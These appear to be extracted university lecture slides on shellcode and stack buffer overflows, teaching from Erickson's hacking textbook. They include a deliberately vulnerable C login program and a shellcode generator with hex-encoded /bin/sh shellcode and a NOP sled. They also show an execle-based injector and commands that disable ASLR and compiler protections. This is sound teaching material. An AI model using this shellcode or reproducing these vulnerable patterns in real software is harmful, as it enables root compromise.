24
Shellcode Georgia Tech ECE6612 Computer Network Security Reviewed by John Copeland 3/30/14 Reference: "Hacking: the Art of Exploitation," Jon Erickson, 2nd ed., ISBN-13: 978-1-59327- 144-2

Shellcode Georgia Tech ECE6612 Computer Network Security Reviewed by John Copeland 3/30/14 Reference: "Hacking: the Art of Exploitation," Jon Erickson,

Embed Size (px)

Citation preview

Shellcode

Georgia Tech ECE6612

Computer Network Security

Reviewed by John Copeland 3/30/14

Reference: "Hacking: the Art of Exploitation," Jon Erickson,

2nd ed., ISBN-13: 978-1-59327-144-2

A computer is exploited ("hacked") if an unauthorized person gains access to the computer's data and computing resources.

This can be done by:1. discovering a valid username and password (e.g.,

guessing or social engineering),2. injecting crafted data into a vulnerable program to

make it do things it should not do (e.g., SQL injection to extract private data, or cause a "buffer overflow" to alter data),

3. injecting "shell code" into the computer memory, and then getting the computer to execute that code.

These slides will demo and discuss the second and third techniques:

1. What is "shellcode".

2. How can it be injected.

3. How can it be run.2

These slides will build up a foundation for further study using the book "Hacking, the Art of Exploitation," ed.2, by Jon Erickson*. Once techniques are known, defenses are incorporated. The hacker community then develops new techniques, and the cycle repeats.

The book discusses the technological basis for past exploits, and details several cycles of hackers versus operating system developers. Neither the book nor these slides show specific techniques that can be used against current, updated operating systems. It does show how to construct a program for testing another program's susceptibility for buffer overflows, illustrating how hackers continually find new vulnerabilities.

"Honey Pots" are computers set up to attract attacks so that the newest exploit code can be studied. The best code today uses sophisticated encryption and obfuscation techniques to prevent disassembly. Observing the network activity of an infected computer often does provide valuable information, especially if the covert channel techniques being used can be discovered.

*www.nostarchpress.com3

Vulnerabilities Fixed in two versions on SeaMonkey Browser (Firefox with Editing)

Fixed in SeaMonkey 2.0.12MFSA 2011-10 CSRF risk with plugins and 307 redirectsMFSA 2011-08 ParanoidFragmentSink allows javascript: URLs in chrome docsMFSA 2011-07 Memory corruption during text run construction (Windows)MFSA 2011-06 Use-after-free error using Web WorkersMFSA 2011-05 Buffer overflow in JavaScript atom mapMFSA 2011-04 Buffer overflow in JavaScript upvarMapMFSA 2011-03 Use-after-free error in JSON.stringifyMFSA 2011-02 Recursive eval call causes confirm dialogs to evaluate to trueMFSA 2011-01 Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17)

Fixed in SeaMonkey 2.0.11MFSA 2010-84 XSS hazard in multiple character encodingsMFSA 2010-83 Location bar SSL spoofing using network error pageMFSA 2010-82 Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/]MFSA 2010-81 Integer overflow vulnerability in NewIdArrayMFSA 2010-80 Use-after-free error with nsDOMAttribute MutationObserverMFSA 2010-79 Java security bypass from LiveConnect loaded via data: URL refreshMFSA 2010-78 Add support for OTS font sanitizerMFSA 2010-77 Crash and remote code execution using HTML tags inside a XUL treeMFSA 2010-76 Chrome privilege escalation with window.open and <isindex> elementMFSA 2010-75 Buffer overflow while line breaking after document.write with long stringMFSA 2010-74 Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16) 4

The C Programming Languageby Brian W. Kerningham and Dennis M. Ritchie*

Developed along with UNIX in 1975 at Bell Labs, Murray Hill, NJ

*Prentice Hall; ed 2 (1988), ISBN-10: 0131103628,ISBN-13: 978-0131103627, $48Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997 )

#include <time.h>#include <stdio.h>#include <string.h>#include <stdlib.h>#include <sys/types.h>#include <sys/stat.h>

char progid[80] = "square_it.c by John Copeland 4/1/2011" ;

int do_square( int x) // "x" here is a local variable, stored in a different{ // location (on the stack) from the "x" in main x = x * x ; return( x ) ;}

int main(int argc, char * argv[ ]){ int x, y ; // modern: replace "int" with "int32_t" char buf[100] ; printf("\n%s\n", progid ) ; while(1) { printf("\n Type number (q = quit) : ") ; gets( buf ) ; if( buf[0] == 'q' ) break ; x = atoi( buf ) ; y = do_square( x ) ; printf(" The square of %d is %d\n", x, y ); } return( 0 ) ;}

5

$ gcc -W all -o square_it square_it.c

$ copeland$ ./square_it

square_it.c by John Copeland 4/1/2011

warning: this program uses gets(), which is unsafe. Type number (q = quit) : 2 The square of 2 is 4

Type number (q = quit) : 3 The square of 3 is 9

Type number (q = quit) : q$

Integer and Character Declarations

CPU Type

Variable Type

DEC PDP-11

Honeywell 6000

IBM 370 Interdata 8/32

32-bit

Intel PC,

IA32

char 8 9 8 8 8

short int 16 36 16 16 16

int 16 36 32 32 32

long int 32 36 32 32 32

long long int

32 36 32 32 64

float

(double/2)

64 36 32 64 32

Old-Style Length in Bits

// modern style: "int x ;" can be replaced by "int32_t x ;" #include <stdint.h>

int32_t x ; uint8_t c ;6

Kept in Symbol Table In Executable Program

C without memory pointers, is no C at allint64_t X, *P, A[10] ; // int64_t replaces "long long"

char S[100] ; // string up to 99 chars, S[99] must = 0 (null)

Name Type of Variable Memory Allocated (bytes)

X 8-byte integer 200-207, is the value of X

P 4-byte pointer to 8-byte integer

210-213, for memory-address

A 4-byte pointer to 8-byte integer

20-99, for 10 8-byte integers

S 4-byte pointer to 1-byte character

100-199 for 100 1-byte characters (integers)

Equivalents: X and *( &X ) -also- S[10] and *(S+10) after P = &X : X and *P and P[0] and *(P + 0 )

"&" means "address of _", * means "value pointed to by _"

7

How Programs are Stored in Memory,and subroutine arguments are put on stack.

Erickson pp. 69-75

Lowest Address

Highest Address

Text or Code Segment

Data Segment

BSS Segment (data)

Heap Segment (grows toward higher addresses)

Stack Segment (grows toward lower addresses)

Return-Value Pointer

Local Variables (e.g.): char buffer[10] int flag

Saved Frame Pointer

Return Instruction Ptr †

Subroutine Input Arguments (passedby value)

Stack Frame

† Modify this address to point at shell code, then return (set program counter) to this address when done.

Process Memory

8

Created by asubroutine orfunction call --->

Subroutine Calls

y = do_square( x )

printf( … )

x = x * x

return( x )

main( )

square_it( )

10000 ->10008 ->

40000 ->

40008 ->

x: 2

y: _ -> 4

ProgramCounterPC or EIP

StackText (Code) Segment Data or BSSSegment

A subroutine call adds memory locations to the top of the stack, to hold all the local variables and the return value for the Program Counter (and Stack Pointer).

9

PC return: 10008

Input Augment 2

Saved Frame Pointer

Return Value Ptr

Augment x: 2 -> 4

Buffer, flags

Stack Frame

Strings in CA string is an array of characters, terminated by a null byte ('\0').

C does not store the length, or maximum length, of a string.

Frequent coding error: forgetting that S below can only hold 9 characters.

Memory: 0000000000apredefined0yes0no00?000PPPP //each char is a byte

Program Line: printf("Results: %c.%s.\n", c, T ) ;

Results: a.predefined.

Program Line: gets( S ) ; //input from keyboard, note S is a char ptr

User types: "c.abcdefghijI GOT YOU !" // > 10 characters

Memory: abcdefghijI GOT YOU ! yes0no00?000PPPP //each char is a byte

Program Line: printf("Results: %c.%s.\n", c,T ) ;

Results: I. GOT YOU ! .

Cure: fgets( S, 9, stdin) ; // limits input string to 9 characters

We can see that a buffer overflow will mess up data, but how do we1) put executable code in a string, and 2) execute it?

char S[10], c='a', T[ ]="predefined", A[3][ ]={"yes","no","?"},*P;

Erickson pp. 5-114 10

Stack Buffer-Overflow

Erickson p. 122

// authenticate_me.c should grant access to only "john" or "cope"#include <stdio.h>#include <string.h>#include <stdlib.h>

int check_auth( char *password) { char pw_buffer[16] ; int auth_flag = 0 ; strcpy(pw_buffer, password ) // string copy if(strcmp( password_buffer, "john" ) == 0 ) // string compare auth_flag = 1 ; if(strcmp( pw_buffer, "cope" ) == 0 ) // string compare auth_flag = 1 ; return( auth_flag ) ;}

int main( int argc, char * argv[ ]) { if( check_auth( argv[ 1 ] ) // if return-augument != 0 printf(" ### Access Granted ### ") ; // for "john" or "cope" else printf(" ### Access Denied ### ") ; // anything else return( 0 ) ;}

11

$ ./authenticate_me john

### Access Granted ###

$ ./authenticate_me cope

### Access Granted ###

$ ./authenticate_me nobody

### Access Denied ###

$ ./authenticate_me xxxxxxxxxxxxxxxx

### Access Granted ###

$ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Segmentation fault

$

Testing "Authenticate_Me"

Overwriting "auth_flag"

Overwriting PC returnvalue in the precedingstack frame.

12

Hackers use programs that automatically try all lengths of input to find a length that does what they want.

Fuzzers

A "Fuzzer" is a program that generates quasi-random data input to a program to test for unanticipated problems.

For example, putting increasing long command line arguments in "Authenticate-Me" would show a range that produced segmentation faults, the a range that worked to get authenticated.

Black-box Fuzzer – produces random input data.

White-box Fuzzer – uses algorithms to increase the code-coverage for testing known code.

13

Shellcode"Shellcode" is binary code that will execute without being processed by a "Loader".

1. Must make kernel system calls directly (no standard lib.s) 2. Must use absolute or relative jumps (no relocatable jumps) 3. Must be written using assembly language, and with a limited set of commands (e.g., no labels).

Development can be helped by looking at assembly code generated by the C compiler, using the gdb debugger.

The original shell code (shown later) starts a shell (e.g., /bin/sh) running so that a command prompt is available. If the vulnerable program is a SUID program (e.g., passwd), then the shell user is "root." Now "shell code" has come to include any similar code with other functions (e.g., installing a back door).

Erickson pp. 281-318 14

Hooking Code

y = do_square( x )

printf( … )

x = x * x

return( x )

main( )

do_square( )

10000 ->

PC return: 80000

Input Augment 2

10008 ->

40000 ->

40008 ->

ProgramCounter

(PC or EIP)

StackText (Code) Segment

starting instruction80000 ->

Shellcode

more instructions

jump 10008

Exploit code that installs shellcode must: Get the PC return value from the Stack for the final "jump" state (or let it crash later). Know where the shellcode has been written in memory, to reset the PC return. The shellcode can reset the stack based on the current SP and SFP values.

Saved Frame Pointer

15

Return Value: 4

Augment x: 2 -> 4

buffer (unused)

SP ->

Later PC Return

Previous Stack Frame

Sled of NOP's

Data Overflowto Inject New "PC Return"

Shellcode

Repeated Address(hopefully -> sled)

// type_shellcode.c// compile: gcc type_shellcode.c -o type_shellcode// output to stdout a (4 x argv[1])-byte sled, shell code, and then argv[2] // start addresses argv[3-6]: ./type_shellcode 10 20 191 255 248 92// 40-byte sled, shellcode, 20 times 0xbffff85c * #include <stdio.h> ;#include <stdlib.h> ;#include <string.h> ; #include <sys/stat.h>

char shellcode[ ] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80""\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89""\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"; // 36 bytes + ‘\x00’

int main(int argc, char * argv[ ]) {int i , n ;char c[4] ;n = 4 * atoi( argv[ 1 ] ) ; // n = 10for(i = 0; i < n ; i++) printf("%c",'\x90');// build sled of NOPs

printf("%s", shellcode ) ;c[0]=atoi(argv[3]); c[1]=atoi(argv[4]); // 191 255 = hex bf ffc[2]=atoi(argv[5]); c[3]=atoi(argv[6]); // 248 92 = hex f8 5cn = atoi( argv[ 2 ] ) ; // n = 20for(i = 0; i < n ; i++) printf("%c%c%c%c", c[0],c[1],c[2],c[3]); // start addresses return( 0 ) ;

}

Usage: > ./authenticate_me $(./type_shellcode 10 20 191 255 248 92 )// To run, you must use gdb to find the right value of the starting address.// bash shell expands $( ./x ) to output of program ./x// *This is for a G4 CPU. For an Intel CPU, reverse the order of address-byte integers.

16

Putting Binary Shellcode into a String, on Command Line

Build sled - 10 nop's

Print shellcode

Build block - 20 ret's

To see where pw_buffer is stored, add a line:

printf(" ======= &pw_buffer = %x = %u\n",(unsigned int) &pw_buffer, (unsigned int) &pw_buffer ) ;

and comment out other printf() lines:

$./authenticate_me john======= &pw_buffer = bfe27540 = 3,219,289,408

$./authenticate_me john======= &pw_buffer = bfecb010 = 3,219,959,824

$./authenticate_me john======= &pw_buffer = bfe35480 = 3,219,346560

$./authenticate_me john======= &pw_buffer = bfe7b720 = 3,219,633952

$./authenticate_me john======= &pw_buffer = bff71840 = 3,220,641,856

$./authenticate_me john======= &pw_buffer = bff96ad0 = 3,220,794,064

$./authenticate_me john======= &pw_buffer = bffeaab0 = 3,221,138,096

Address space layout randomization (ALSR)

Stack Overflow Injection is now difficult because the address of the stack frame varies over a range of 2,000,000 bytes, each time the modified program was run.

It only needs to work once. By automatically trying up to a million times, a single hit is probable, and that can install a back door to root. (see p. 384-391)

17

// execle_run.c #include <stdio.h>#include <string.h>#include <stdlib.h>#include <unistd.h>#include <stdint.h>

int main(int argc, char *argv[ ]) { char *env[2][ ] = {"\x31\xc0\x31 … \xcd\x80", NULL}; //Must be NULL uint_32 i, ret = 0xbffffffa;//address of env[0] in "authenticate_me" char buffer[161] ;

for(i=0;i<160;i+=4) *( (uint32_t*) (buffer+i) ) = ret ; // put in 4-byte address buffer[160] = 0 ; execle("./authenticate_me", "authenticate_me", buffer, NULL, env ); return( 0 ) ; }

Run a program with execle() to limit the Environment. Put the shellcode into the only Environment string, env[0]. The overflow string (buffer) only has to have the starting address (ret), repeated many times.*

* Erickson pp. 149-150 ** With today's (2011) Linux, "ret" has to match a different value on each run, even when execle() is used.

18

Buffer overflows can be used to:

Alter data later used in control statements.

Input data and control data on stack.

Inject shellcode and cause it to be executed. Basic problem:

Input data and Program-Counter return values are kept on the stack. PC can point to a stack address.

Other types of overflows:Stack segment overflow (p. 150)Function pointer overflow (p. 156)Printf format strings(p.171)

Examine stack valuesRead arbitrary values from memoryWrite arbitrary values to memory

19

Present day c compilers (gcc) and Linux are designed to defeat most of the techniques discussed in "Hacking, the Art of Exploitation". 

For those of you who would like to experiment with code that has vulnerabilities, you can turn some of these protections off in the OS, and in the gcc compiler:

*** to disable ASLR (Address Space Layout Randomization) : This change is immediate on the running OS kernel (run with root privileges).

sudo echo 0 > /proc/sys/kernel/randomize_va_space

(when done: echo 1 > /proc/sys/kernel/randomize_va_space)

*** To turn off gcc protections when you compile your program, use options

-fno-stack-protector       this will disable canaries

-fno-stack-protector-all

-fno-address-sanitizer     Turn off AddressSanitizer, a memory error detector.

-fno-memsafety

-z execstack       this will disable executable stack protection

-fnomudflap          this will disable protections for risky pointer

operations that may be used in overflows - to not catch runtime memory

access errors. Example gcc compile:

 > gcc –g -fno-stack-protector -z execstack –Wall  –o program program.c

-Wall shows all warnings, always good to have,

-g so you can use gdb to show c code lines, and variable locations.

Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.)

20

Networking, Chapter 4

Concise explanation of of sockets, protocol stack, formats, …

Simple code for:Server program (p.204)Web Server program (p.213)Network traffic sniffing (p.224)Source code for Nemesis (arp spoofing, p.245)SYN flood, Ping of Death, Ping Flood, …TCP/IP highjacking (p.258)Port scanning (p.264)Pro-active defense (p.267)Port-binding shellcode (p.278)

21

Shellcode, Chapter 5

Using ASM to write assembly code (p.281)

Linux system calls (p.283)

Investigating with gdb (p.289)

Removing null bytes (p.290)

Shell-spawning shellcode (the original, p.295)

Port-binding shellcode (for backdoors, p.303)

Connect-back shellcode (defeat firewalls, p.314)

22

Counter Measures, Chapter 6

Counter measures that detect intrusion (p.320)

Log files (p.334)

Rootkit techniques (p.348)

Socket reuse (p.355)

Payload smuggling (hiding signatures, p.359)

Polymorphic Printable ASCII shellcode (p.366)

Non-executable stack (available, not used, p.376)

Randomized stack space (seen earlier, p.379)

Defeating above (p.388)

23

Cryptology, Chapter 7

Basics (p.393)

Symmetric encryption (p.398)

Asymmetric encryption (p.400)

Hybrid Ciphers (man-in-the-middle attacks, p.406)

SSH attacks

Password Cracking (p.418)

Dictionary attacks, Rainbow Tables

Wireless 802.11b WiFi encryption (p.436)

WPA attacks - not covered

Conclusion, Chapter 8 (pp. 452-453)

24